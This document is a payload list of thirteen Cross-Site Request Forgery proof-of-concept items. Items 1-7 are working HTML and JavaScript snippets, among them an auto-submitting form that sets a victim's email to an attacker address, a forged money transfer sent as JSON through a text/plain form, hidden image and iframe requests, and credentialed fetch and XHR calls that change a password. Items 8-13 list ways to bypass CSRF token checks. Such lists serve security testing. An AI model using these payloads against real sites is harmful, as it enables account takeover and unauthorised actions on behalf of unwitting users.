Cross-Site Request Forgery proof-of-concept payloads for auto-submitting forms, XHR, fetch, and JSON CSRF. (13 payloads)
Payloads (HTML/JS proof-of-concept snippets, 1-7):

1. Auto-submitting POST form:
<form action="https://TARGET/change-email" method="POST"><input type="hidden" name="email" value="attacker@evil.com"/></form><script>document.forms[0].submit();</script>

2. JSON body sent through a text/plain form (the input name carries the JSON, the value closes it):
<form action="https://TARGET/transfer" method="POST" enctype="text/plain"><input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'/></form><script>document.forms[0].submit();</script>

3. GET request via hidden image:
<img src="https://TARGET/delete?id=1" style="display:none">

4. GET request via hidden iframe:
<iframe src="https://TARGET/action?param=value" style="display:none"></iframe>

5. fetch with form-encoded body and credentials included:
<script>fetch("https://TARGET/api/change-password",{method:"POST",credentials:"include",headers:{"Content-Type":"application/x-www-form-urlencoded"},body:"password=hacked"})</script>

6. XMLHttpRequest with credentials:
<script>var x=new XMLHttpRequest();x.open("POST","https://TARGET/api/action");x.withCredentials=true;x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");x.send("param=value");</script>

7. fetch with JSON body and credentials included:
<script>fetch("https://TARGET/api/action",{method:"POST",credentials:"include",headers:{"Content-Type":"application/json"},body:JSON.stringify({key:"value"})})</script>

Token-validation checks (8-13):

8. Remove CSRF token parameter entirely
9. Use empty string as CSRF token value
10. Swap CSRF token from another session
11. Change POST to GET and move params to query string
12. Change Content-Type to text/plain or multipart/form-data
13. Use same CSRF token value twice